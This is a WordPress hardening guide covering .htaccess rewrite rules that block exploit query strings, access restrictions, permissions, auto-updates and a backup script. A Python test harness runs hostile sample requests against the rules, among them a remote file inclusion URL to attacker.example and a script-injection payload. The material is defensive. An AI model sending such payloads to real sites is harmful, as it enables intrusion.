Here are some security tricks to improve security on the WordPress CMS:
Restrict the database user's privileges: CREATE and ALTER are only needed occasionally, when upgrading; INSERT, UPDATE, and SELECT are used all the time.
First, make sure your php.ini contains:
memory_limit = 32M
upload_max_filesize = 10M
post_max_size = 20M
.htaccess is also important in hardening WordPress because it is easy to use. Here is an example:
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site, comment out the operations listed below
## This attempts to block the most common types of exploit attempts against WordPress!
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Answer any request matching the conditions above with a 403 Forbidden error (the [F] flag ignores the rewrite target)
RewriteRule ^(.*)$ index.php [F,L]
# Block the include-only files.
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>
########## End - Rewrite rules to block out some common exploits
# Allow login access to your admin area only from your IP:
<Files wp-login.php>
Order Deny,Allow
Deny from All
# Allow access from my IP address
Allow from x.x.x.x
</Files>
# Deny access to the configuration file, which contains usernames and passwords:
<Files wp-config.php>
Order Allow,Deny
Deny from all
</Files>
<Files .htaccess>
Order Allow,Deny
Deny from All
</Files>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
php_value upload_max_filesize 10M
php_value post_max_size 20M
php_value memory_limit 32M
In php.ini, also make sure uploads are enabled:
file_uploads = On
If you don't have file_uploads = On you usually get this message when uploading:
"Please select a file"
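The query-string conditions in the rewrite-rule block above are worth testing offline before they go live, because they match the raw, still %-encoded QUERY_STRING and can also catch legitimate requests. This is an added example, not code from the original post: it re-implements those five RewriteCond patterns in Python and runs constructed sample requests through them, including one benign search query that trips the base64_encode rule.

```python
import re
from urllib.parse import urlsplit

# The RewriteCond patterns from the .htaccess above, as (name, regex, flags).
# Apache tests them against the raw, still %-encoded QUERY_STRING, which is
# why the rules list both the literal and the %-encoded forms of <, > and =.
QUERY_STRING_RULES = [
    ("mosConfig",  r"mosConfig_[a-zA-Z_]{1,21}(=|\%3D)",   0),
    ("base64",     r"base64_encode.*\(.*\)",                0),
    ("script-tag", r"(\<|%3C).*script.*(\>|%3E)",          re.IGNORECASE),  # [NC]
    ("GLOBALS",    r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})",        0),
    ("_REQUEST",   r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})",       0),
]


def blocked_by(url):
    """Return the name of the first rule whose pattern matches the URL's raw
    query string (the conditions are chained with [OR]), or None if the
    request would pass. RewriteCond matching is unanchored, hence re.search."""
    query = urlsplit(url).query
    for name, pattern, flags in QUERY_STRING_RULES:
        if re.search(pattern, query, flags):
            return name
    return None


# Constructed sample requests (not real traffic): three that the rules are
# meant to stop, one normal WordPress request, and one legitimate search
# query that is a false positive worth knowing about before deploying.
SAMPLES = [
    "/index.php?mosConfig_absolute_path=http://attacker.example/x.txt",
    "/?s=%3Cscript%3Ealert(1)%3C/script%3E",
    "/?foo=1&GLOBALS[admin]=1",
    "/?p=123&preview=true",
    "/?s=how+to+use+base64_encode()+in+php",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(f"{blocked_by(url) or 'allowed':10}  {url}")
```

The last sample shows why the author warns to comment rules out if the site misbehaves: a search for "base64_encode()" is blocked even though it is harmless.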
Directory permissions:
find /path/to/your/wordpress/install/ -type d -exec chmod 755 {} \;
File permissions:
find /path/to/your/wordpress/install/ -type f -exec chmod 644 {} \;
# Enable all core updates, including minor and major (in wp-config.php):
define( 'WP_AUTO_UPDATE_CORE', true );
Disable file editing from the WordPress dashboard (also in wp-config.php):
define( 'DISALLOW_FILE_EDIT', true );
Backups (a daily cron script that keeps the last three days of database dumps and file archives):
#!/bin/bash
# Remove the dump and archive from 3 days ago (file names use the same YYYY-MM-DD format as below)
/bin/rm -f /mnt/*`date +%F --date='3 days ago'`.sql
/bin/rm -f /mnt/*`date +%F --date='3 days ago'`.tgz
# Dump the database (a password passed with -p is visible in the process list; a ~/.my.cnf readable only by the backup user is safer)
/usr/bin/mysqldump database_wp -u user_wp -p'mysqlpass' > /mnt/serverincloud.eu-`date +%Y-%m-%d`.sql
# Archive the site files, preserving permissions (-p) and absolute paths (-P)
/bin/tar -czpPf /mnt/serverincloud.eu-`date +%Y-%m-%d`.tgz /home/serverincloudeu/public_html/